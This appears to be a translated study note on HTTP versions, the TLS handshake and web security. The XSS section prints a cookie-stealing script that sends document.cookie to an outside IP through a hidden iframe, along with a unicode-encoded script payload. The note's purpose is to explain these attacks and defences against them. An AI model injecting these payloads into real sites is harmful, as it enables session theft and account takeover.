0%

HTTP & Network Security

This article focuses on some common computer networking concepts and summarizes them for future in-depth understanding of web development.

Network

HTTP Protocol

Introduction

HTTP is a TCP/IP based application layer protocol. It does not involve the transmission of datagrams, but mainly specifies the format of communication between the client and the server, and uses port 80 by default.

HTTP/1.0

Introduction

  • 1996 - Released

  • Version 1.0 introduced the POST and HEAD commands in addition to the GET command, which was the only one available in version 0.9.

  • HTTP request and response formats, in addition to including data sections must also include header information i.e. HTTP HEADER (to describe metadata)

request format

Request command + multi-line headers

1
2
3
GET / HTTP/1.0 request command
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) Multi-line headers
Accept: */* Multi-line headers

Response format

Header + blank line + data. First line is protocol version + status code + status description

1
2
3
4
5
6
7
8
9
10
HTTP/1.0 200 OK first line
Content-Type: text/plain from here onwards is the header
Content-Length: 137582
Expires: Thu, 05 Dec 1997 16:00:00 GMT
Last-Modified: Wed, 5 August 1996 15:55:28 GMT
Server: Apache 0.84
This is a blank line
<html> Data from here onwards
<body>Hello World</body>
</html>

Content-Type field

The headers are ASCII, but the data can be in any format. Therefore Content-Type is needed to tell the client the format of this data.

Common Content-Type field values are as follows.

1
2
3
4
5
6
7
8
9
10
11
12
text/plain
text/html
text/css
image/jpeg
image/png
image/svg+xml
audio/mp4
video/mp4
application/javascript
application/pdf
application/zip
application/atom+xml

These data types are collectively known as MIME type and are in the format: primary type/secondary type.

Content-Encoding field

As the data sent can be in any format, it is possible to compress the data before sending it. The Content-Encoding field describes how the data is compressed. Common compression methods.

1
2
3
Content-Encoding: gzip
Content-Encoding: compress
Content-Encoding: deflate

Also** when the client requests**, it can specify the compression method it accepts, using the field Accept-Encoding. as follows.

1
Accept-Encoding: gzip, deflate

Disadvantages

The main problem with HTTP/1.0 is that: only one request can be sent per TCP connection. Once the data is sent, the link is closed. To request another resource, another TCP connection must be created. The TCP connection requires three handshakes between the client and the server, and starts off slowly due to slow start, making it costly to create a new TCP connection.

** To solve this problem, some browsers use the non-standard field Connection. **

1
Connection: keep-alive

The above field requires the server not to close the TCP connection so that other requests can reuse it, and that reusable TCP connection will not be disconnected until either the client or the server actively closes it. However, this method is not standard.

HTTP/1.1

Used from 1997 to 201 several, until HTTPS.

Persistent connections

  • The biggest change in version 1.1 was the introduction of persistent connection, i.e. TCP connections are not closed by default, can be reused by multiple requests and do not need to declare Connection:keep-alive.
  • A connection is actively closed when there has been no communication between the client and the server for a period of time. However, the normative practice is for the client to send Connection: close on the last request, explicitly asking the server to close the TCP connection.

**Note: **For the same domain name, most browsers allow 6 persistent connections to be established at the same time.

Pipeline mechanism

In version 1.0, within the same TCP connection, if a client wanted to request two resources, it would send request A first, then wait for the server to respond, and then send request B after receiving the response**.

In version 1.1 the pipelining mechanism was introduced, which allows the browser to send both an A request and a B request, but the server still responds to the A request first, in order, and then to the B request when it is done.

Thus, the pipelining mechanism allows clients to send multiple requests at the same time over the same TCP connection.

Content-Length field

** Used to declare the length of the data for this response. **

chunked-transfer-encoding

In short, it means that the server sends a piece of data as it is generated, i.e. it uses the stream mode instead of the buffer mode.

Therefore, version 1.1 can use chunked transfer encoding instead of the Content-Length field. Whenever a request or response has a Transfer-Encoding field in its header, it indicates that the response will consist of an undetermined number of chunks of data.

Note: Each non-empty block of data will be preceded by a hexadecimal value to indicate the length of the block. It ends with a block of size 0, indicating that the data for this response has been sent. Examples are as follows.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
HTTP/1.1 200 OK
Content-Type: text/plain
Transfer-Encoding: chunked

25
This is the data in the first chunk

1C
and this is the second one

3
con

8
sequence

0

Other features

  • Version 1.1 also adds many new verb methods such as PUT, PATCH, HEAD, OPTIONS, DELETE
  • A new HOST field** has been added to the client request headers to specify the server’s domain name. With the HOST field it is possible to send a request to a different website on the same server. (Laying the groundwork for the rise of virtual machines)

Disadvantages

There is Head-of-line blocking. Although multiplexing of TCP connections is allowed, data communication within the same TCP connection is still sequential and the server can only respond to the next request after processing the response to the first one. If the response to the previous request is slow, then there will be many requests queued up behind it.

Ways to avoid queue head blocking are.

  1. reduce the number of requests. For example, merging scripts and stylesheets, embedding images in CSS code
  2. Multiple simultaneous persistent connections. For example, domain sharding, where the required downloads can come from multiple domains, can solve the concurrency limit.

HTTP/2

Binary protocol

HTTP/1.1 has a text (ASCII) header and a text or binary data body. HTTP/2, however, is a thoroughly binary protocol, where both the header and the data body are binary, and are collectively referred to as “frames”: header frames and data frames.

The advantage of the binary protocol is that additional frames can be defined.

Multiplexing

In HTTP/2, both the client and the browser can send multiple requests and responses at the same time over the same TCP connection, without having to correspond to each other in order, thus avoiding the problem of queue head blocking.

For example, in a TCP connection, the server receives both request A and request B. It responds to request A first, which turns out to be very time-consuming to process, so it sends the part of request A that has already been processed, then processes the response to request B, and when it’s done, it processes the rest of the request that sent A. We call this duplex, real-time communication multiplex.

data flow

In HTTP/2, packets are sent out of order; consecutive packets inside the same connection may belong to different responses, so it is necessary to mark the packet to indicate which response it belongs to.

HTTP/2 refers to all packets of each request or response as a stream. Each stream is given a unique number. When a packet is sent, it must be marked with a stream ID that identifies which stream it belongs to. In addition, all stream IDs sent by the client are odd numbers and all stream IDs sent by the server are even numbers.

When the stream is sent halfway, both the client and the server can signal the stream to be cancelled. In HTTP/1.1, the only way to cancel a stream was to close the TCP connection. HTTP/2 can cancel a request while ensuring that the TCP connection is still open and can be reused for other requests.

The client can also specify the priority of the data stream, the higher the priority the sooner the server will respond to it.

header compression

As many fields in the request headers are repeated in each request (e.g. Cookie, User Agent, etc.), this can result in a lot of wasted bandwidth. HTTP/2 optimises this by introducing header compression. On the one hand, headers are compressed using methods such as gzip before being sent; on the other hand, the client and server maintain a header table which is a mapping of fields and index numbers, after which only the index numbers are sent to improve speed.

Server Push

HTTP/2 allows the server to send resources to the client unsolicited without receiving a request.

For example, if a client requests a web page containing many static resources, the server will actively send these static resources to the client along with the web page, so that there is no need to wait for the client to receive the web page and parse the HTML to find static resources before requesting static resources.

HTTPS - Extra

The security of Internet communications is built on the SSL/TLS protocol.

Note: SSL - Secure Sockets Layer, TLS - an upgrade from SSL

Reasons for using HTTPS & what it does

Comparison:

  • HTTP does not use SSL/TLS and is therefore unencrypted communication, all information is transmitted in clear text

    1. Eavesdropping risk: third parties can intercept and be informed of the content of communications
    2. tampering: third parties can intercept and modify the content of communications
    3. pretending: a third party can impersonate another person to participate in the communication
  • Benefits of HTTPS based on SSL/TLS protocol

    1. All messages are transmitted encrypted - no eavesdropping
    2. with a checksum mechanism - any tampering with the content of the communication can be detected by both parties to the communication
    3. Equipped with a certificate of identity - prevents identity impersonation

The basic operation of the SSL/TLS protocol

The basic idea of the protocol is:** asymmetric encryption: public key encryption, private key decryption**. That is, the client first asks the server for the public key, then encrypts the message with the public key, and the server receives the ciphertext and decrypts it with its own private key.

  1. How to ensure that the public key cannot be tampered with?

    Answer: Put the public key into the digital certificate, as long as the certificate is trusted, then the public key is trusted.

  2. How to reduce the time required for encryption with a public key that is too computationally intensive?

    Answer: For each conversation (session), the client and the server will generate a “conversation key” (session key), which will be used to encrypt the message. As the session key is a symmetric encryption, it is very fast, so if the server public key is only used to encrypt the session key itself, the time consumed for encryption is greatly reduced.

So, the basic process of the SSL/TLS protocol is

  1. the client requests and verifies the public key from the server - the handshake phase
  2. both parties negotiate to generate a “conversation key “
  3. both parties use the “conversation key “ for encrypted communication

Handshake phase

The handshake phase involves four communications and all communications during this phase are in plaintext.

Phase 1: The client sends a request

First, the client sends an encrypted communication request to the server. The request it sends is mainly about the following.

  1. the supported protocol version, e.g. TLS 1.0
  2. a random number generated by the client to be used later to generate a “conversation key”
  3. the encryption method supported, e.g. RSA public key encryption
  4. supported compression methods

Phase 2: Server Response

The server receives a request from the client and sends a response to the client. The response mainly includes the following.

  1. confirmation of the version of the encrypted communication protocol used. If the two sides do not support the same version, the server will close this encrypted communication
  2. a random number generated by the server to be used later to generate the “conversation key”
  3. confirmation of the encryption method used
  4. the server certificate

Phase 3: Client Response

When the client receives the response from the server, it first verifies the server’s digital certificate.

If 1. the certificate is not credible. 2. the domain name in the certificate does not match the actual domain name. 3. the certificate has expired, a warning is displayed to the visitor, giving him/her the option to continue the communication or not.

If there is no problem with the certificate, the client will take the server’s public key from the certificate and send a response to the server with the following main contents.

  1. A random number generated by the client. The random number is encrypted with the public key to prevent eavesdropping.
  2. A notification of the change in encoding. Indicates that subsequent messages will be sent using the mutually agreed encryption method and key.
  3. client end of handshake notification. Indicates the end of the client’s handshake phase, this item is also the hash value of all content sent earlier and is used for server verification.

Note: The random number generated in this phase is the third random number (“pre-master key”) that appears throughout the handshake phase. With this, both the client and the server have three random numbers at the same time, and then each side generates the same “session key” for the session, using a pre-agreed encryption method.

Phase 4: Final server response

Once the server has received the third random number, it calculates and generates the “session key” for the current session. A final response is then sent to the client. The main contents are as follows.

  1. Notification of code change. This indicates that the subsequent message will be sent with the agreed encryption method and key. 2.
  2. End of server handshake notification. Indicates that the handshake phase of the server has ended. This item is also the hash value of all the content sent earlier and is used for verification by the client.

At this point, the entire handshake phase is complete. Next, the client and server communicate encrypted, which is exactly the same as the normal HTTP protocol, except that all sent content is encrypted using the “session key”.

Web Security

XSS - Cross Site Scripting

Introduction

XSS, known as Cross-site scripting, or cross-site scripting in Chinese, is a type of attack on the security vulnerability of web applications, i.e. a type of code injection. This type of attack usually involves both HTML and user scripting languages (mainly JavaScript).

For example, posting a malicious piece of JavaScript code on a web forum in JavaScript is a script injection, while at the same time if the content of this code has the ability to request an external server, then it is called XSS.

Therefore, it can be understood as XSS (cross-site scripting) = script injection + the ability to request an external server.

Example

For example, the following code is written for posting content in a forum site.

1
2
3
4
5
<script
while (true) {
alert('keep popping up windows')
}
</script>

Assuming the forum site has no filtering or other defence mechanisms, any user visiting this thread will have this pop-up popping up all the time in the client interface.

**This is script injection in its simplest form. **Of course this script is not substantially more harmful then XSS is based on a script injection method to accomplish this, but it is injecting a script that contains a request for cross-site functionality.

For example, in the forum site mentioned above, the following code is injected.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script
(function(window, document) {
// Construct the URL for the leaked information
var cookies = document.cookie;
var xssURIBase = "http://192.168.123.123/myxss/";
var xssURI = xssURIBase + window.encodeURI(cookies);
// Create a hidden iframe for communication
var hideFrame = document.createElement("iframe");
hideFrame.height = 0;
hideFrame.width = 0;
hideFrame.style.display = "none";
hideFrame.src = xssURI;
// start
document.body.appendChild(hideFrame);
})(window, document);
</script>

This code will pass the cookie of any user who visits the post to a server with the name http://192.168.123.123/myxss/, which can then take this cookie and visit the corresponding website and log into the user’s account, which can then perform other operations.

Therefore, the above code is XSS.

CSRF - Cross Site Request Forgery

Introduction

CSRF, known as Cross-site request forgery, is a form of cross-site request forgery. It is an attack method that allows a user to perform some unintended actions** (such as name change, post deletion, emailing, etc.) on a currently logged-in web application.

Attack Principle

Generally speaking, CSRF is implemented by XSS, on top of cross-site scripting, to implement forged requests, causing the victim to perform actions that he or she would not have intended to perform.

**Note: CSRF can also be implemented without XSS. **

Example

After the external server has successfully obtained the user’s cookie, it can use the cookie to forge a series of requests to the forum website, such as changing the user’s name, changing the user’s password, etc. At this point, the attack can be called a CSRF.

Protection against XSS and CSRF ⭐️

Core idea: don’t trust any external source data!!!

Generally speaking, most CSRF is based on XSS, so it can be said that by defending against XSS, you are basically defending against CSRF as well.

For the prevention of XSS, there are two main methods as follows.

  1. Input filtering: thorough sensitive character filtering of external input - front end + back end
  2. Output filtering: when displayed on the page, do some processing so that sensitive code scripts cannot be executed smoothly - front-end

Theoretically, wherever there is input data, there is an XSS vulnerability. JavaScript scripts can be injected into the database in various forms (e.g. plaintext, encoded, etc.).

As mentioned above JS can be injected in a variety of illegal forms, the main illegal forms are of two types.

  1. Plaintext:

    1
    2
    3
    <script>
    ... // js malicious code
    </script>

    To handle the filtering of plaintext injections.

  2. Coding:

    1
    u0026u006cu0074u003bu0073u0063u0072u0069u0070u0074u0026u0067u0074u003bu0061u006cu0065u0072u0074u0028u0026u0023u0033u0039u003bu6211u662fu0078u0073u0073uff0cu4f60u6709u9ebbu70e6u4e86u0026u0023u0033u0039u003bu0029u0026u006cu0074u003bu002fu0073u0063u0072u0069u0070u0074u0026u0067u0074u003b

    The above encoding is unicode, which bypasses the htmlSpecialChars filter and is imported into the library, and then when the message is displayed, the html automatically converts the unicode encoding into plaintext, i.e. a real executable script.

    Since not only unicode can be injected, but other types of encoding as well (for similar reasons), we need to try to set the character encoding of the page to one (e.g. unicode: utf-8) so that we can focus on unicode injection.

Some other general prevention methods

  1. add the Http Header of the Content Security Policy to the output html

    What it does: Prevents the page from being embedded in a third-party script file when attacked by XSS

  2. add HttpOnly parameter when setting cookies

    Function: To prevent cookie information from being stolen when the page is attacked by XSS

    Disadvantage: the website’s own JavaScript code cannot manipulate cookies

  3. check the Referer parameter of the request when developing the API

    Effect: It can prevent CSRF attacks to a certain extent